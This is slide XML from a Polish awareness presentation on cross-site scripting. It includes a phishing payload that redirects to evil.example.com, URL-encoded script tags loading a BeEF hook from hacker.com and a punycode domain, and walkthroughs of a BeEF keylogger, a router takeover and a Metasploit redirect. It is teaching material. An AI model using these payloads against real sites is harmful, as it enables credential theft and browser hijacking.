              <a:t>Stored</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0" err="1"/>
              <a:t>Reflected</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pl-PL" sz="2800" dirty="0" smtClean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&lt;adam@adamziaja.com&gt;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665987"/>
            <a:ext cx="3620958" cy="2427309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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="pole tekstowe 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19535393">
            <a:off x="6519842" y="3950671"/>
            <a:ext cx="24155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i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS to nie tylko</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wyświetlenie okienka</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>w oknie przeglądarki!</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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3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Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> XSS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8147"/>
            <a:ext cx="7620000" cy="4429125"/>
          </a:xfr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&lt;adam@adamziaja.com&gt;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827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Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> XSS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12777"/>
            <a:ext cx="7620000" cy="4429125"/>
          </a:xfr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&lt;adam@adamziaja.com&gt;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367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XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> (ładunek)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/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0" err="1"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.body.innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Aby zobaczyć tę stronę musisz się &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="http://evil.example.com"&gt;zalogować&lt;/a&gt;. Za 5 sekund zostaniesz automatycznie przeniesiony do strony logowania.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>setTimeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>location.replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("http://evil.example.com")', 5000)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0" err="1"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="24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&lt;adam@adamziaja.com&gt;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630" y="4107140"/>
            <a:ext cx="3634740" cy="2202180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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="pole tekstowe 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20750769">
            <a:off x="6524306" y="4874091"/>
            <a:ext cx="244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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>phishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> przy użyciu XSS</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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9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XSS, możliwości m.in.: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Kradzież poświadczeń (np. zawartość „</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Modyfikacja treści i wyglądu strony</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Przekierowanie na inną stronę</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Podsłuch w obrębie danej strony internetowej…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3717032"/>
            <a:ext cx="3429000" cy="2571750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5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pl-PL" dirty="0" smtClean="0"/>
              <a:t>© Adam Ziaja &lt;adam@adamziaja.com&gt;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462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r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>beefproject.com – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> do ataków XSS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209575"/>
            <a:ext cx="1905000" cy="1419225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&lt;adam@adamziaja.com&gt;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63331"/>
            <a:ext cx="2419350" cy="2190749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687779"/>
            <a:ext cx="7314286" cy="477525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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="pole tekstowe 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1601931">
            <a:off x="7005035" y="536352"/>
            <a:ext cx="2007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i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>symulacja!</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="3200" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000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07504" y="128826"/>
            <a:ext cx="31464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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ielona ramka – ofiara</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>czerwona ramka – atakujący</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Łącznik prosty ze strzałką 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3347864" y="4661993"/>
            <a:ext cx="0" cy="115212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3067989" y="4301953"/>
            <a:ext cx="503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>
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>przykładowa zmienna GET podatna na </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> XSS</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0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3520177" y="4806009"/>
            <a:ext cx="5444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>
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (ładunek) nawiązujący połączenie z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BeEFem</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Łącznik prosty ze strzałką 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4268704" y="5175341"/>
            <a:ext cx="1527432" cy="638780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19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3030910" y="6051950"/>
            <a:ext cx="631676" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0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 flipV="1">
            <a:off x="3779912" y="6051948"/>
            <a:ext cx="4084716" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/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0B0F0"/>
              </a:solidFill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334990" y="2789785"/>
            <a:ext cx="3156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00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strona zawiera panel logowania</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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94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73648"/>
            <a:ext cx="1905000" cy="1419225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&lt;adam@adamziaja.com&gt;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6529524" cy="5104762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2" name="pole tekstowe 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6732240" y="2229832"/>
            <a:ext cx="23762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2000" dirty="0" smtClean="0"/>
              <a:t>Ogólne dane o przeglądarce oraz systemie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000" dirty="0" smtClean="0"/>
              <a:t>Aktywne komponenty </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>itp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85561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Autofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Atakujący przy pomocy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0" smtClean="0"/>
              <a:t>-a umieszcza </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0" smtClean="0"/>
              <a:t> w pływającej ramce, w której załaduje się „</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0"/>
              <a:t>Atakujący podsyła ofierze odnośnik z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0" smtClean="0"/>
              <a:t>XSS-em…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209575"/>
            <a:ext cx="1905000" cy="1419225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&lt;adam@adamziaja.com&gt;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64662"/>
            <a:ext cx="5505450" cy="2025094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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="pole tekstowe 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="3009726"/>
            <a:ext cx="8103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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%3Cscript%20src%3Dhttp%3A//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hacker.com%3A3000/hook.js%3E%3C/script%3E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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3Cscript%20src%3Dhttp%3A//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kda4b0koi.pl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%3E%3C/script%3E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l-PL" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xn--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kda4b0koi.pl </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> zakodowana forma (ACE) domeny </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>żółć.pl</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Prostokąt 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2915816" y="4437112"/>
            <a:ext cx="3096344" cy="45719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78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Informacje o prezentacji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Prezentacja ma na celu uświadomienie jak prosto można wykonywać ataki na aplikacje webowe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Wszystkie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> elementy samych ataków są </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>symulacjami </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>przeprowadzonymi w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0"/>
              <a:t>środowisku laboratoryjnym (dlatego też wszystkie zrzuty ekranów wykonane są z prywatną klasą </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>adresową)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103" y="4027983"/>
            <a:ext cx="2631281" cy="2569369"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5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pl-PL" dirty="0" smtClean="0"/>
              <a:t>© Adam Ziaja &lt;adam@adamziaja.com&gt;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 rot="21063540">
            <a:off x="857329" y="5055191"/>
            <a:ext cx="3371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>
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…prezentacja będzie dostępna do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pobrania w materiałach po TAPT</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2400" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="142282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209575"/>
            <a:ext cx="1905000" cy="1419225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&lt;adam@adamziaja.com&gt;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52" y="1903978"/>
            <a:ext cx="8238096" cy="4333333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5" name="Prostokąt 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7092280" y="2492896"/>
            <a:ext cx="1598768" cy="936104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0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&lt;adam@adamziaja.com&gt;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628800"/>
            <a:ext cx="8572500" cy="4533900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:noFill/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37567"/>
            <a:ext cx="1905000" cy="1419225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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l-PL" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Przykładowy scenariusz ataku</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" sz="4000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" sz="3100" dirty="0" smtClean="0"/>
              <a:t>(w przypadku podatności XSS na routerze)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342462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448" y="116632"/>
            <a:ext cx="1905000" cy="1419225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&lt;adam@adamziaja.com&gt;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75" y="187042"/>
            <a:ext cx="6038609" cy="6194286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2" name="pole tekstowe 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6228184" y="1580594"/>
            <a:ext cx="27363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2000" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" smtClean="0"/>
              <a:t>takujący ustawia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" smtClean="0"/>
              <a:t> w przeglądarce na 127.0.0.1:6789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000" dirty="0"/>
              <a:t>Ł</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ączy się do strony podatnej na XSS za pośrednictwem komputera ofiary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(czyli z jej adresem IP)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000" dirty="0" smtClean="0"/>
              <a:t>Loguje się podsłuchanym hasłem lub próbuje domyślne hasło dla danego routera…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000" dirty="0" smtClean="0"/>
              <a:t>Zmiana adresów DNS, poznanie hasła </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>WiFi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Prostokąt 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="1051138"/>
            <a:ext cx="3168352" cy="936104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79512" y="5443626"/>
            <a:ext cx="3528392" cy="216024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79512" y="5731658"/>
            <a:ext cx="5904656" cy="504056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 rot="2098129">
            <a:off x="839696" y="2105561"/>
            <a:ext cx="746460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HACKED</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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951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Cross-Site Scripting (XSS)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 smtClean="0"/>
              <a:t>Podatność można wykorzystać nie tylko do kradzieży poświadczeń ale również np.:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>taku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t> (D)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>(szczególnie w przypadku </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t> XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>rzekierowania (analogicznie jak w pierwszym </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0"/>
              <a:t>przykładzie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>„</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>location.replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>”) na </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>w celu zaatakowania podatnej przeglądarki użytkownika</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="28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&lt;adam@adamziaja.com&gt;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57" y="4984503"/>
            <a:ext cx="5714286" cy="139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Atak z wykorzystaniem MSF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ln w="25400">
            <a:solidFill>
              <a:srgbClr val="00B050"/>
            </a:solidFill>
          </a:ln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&lt;adam@adamziaja.com&gt;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 rot="20688106">
            <a:off x="2916674" y="3588208"/>
            <a:ext cx="3310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przykładowy wygląd przeglądarki</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IE8 po przeprowadzeniu ataku…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="214648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23" y="260648"/>
            <a:ext cx="6066667" cy="5959365"/>
          </a:xfrm>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9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pl-PL" dirty="0" smtClean="0"/>
              <a:t>© Adam Ziaja &lt;adam@adamziaja.com&gt;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79512" y="2276872"/>
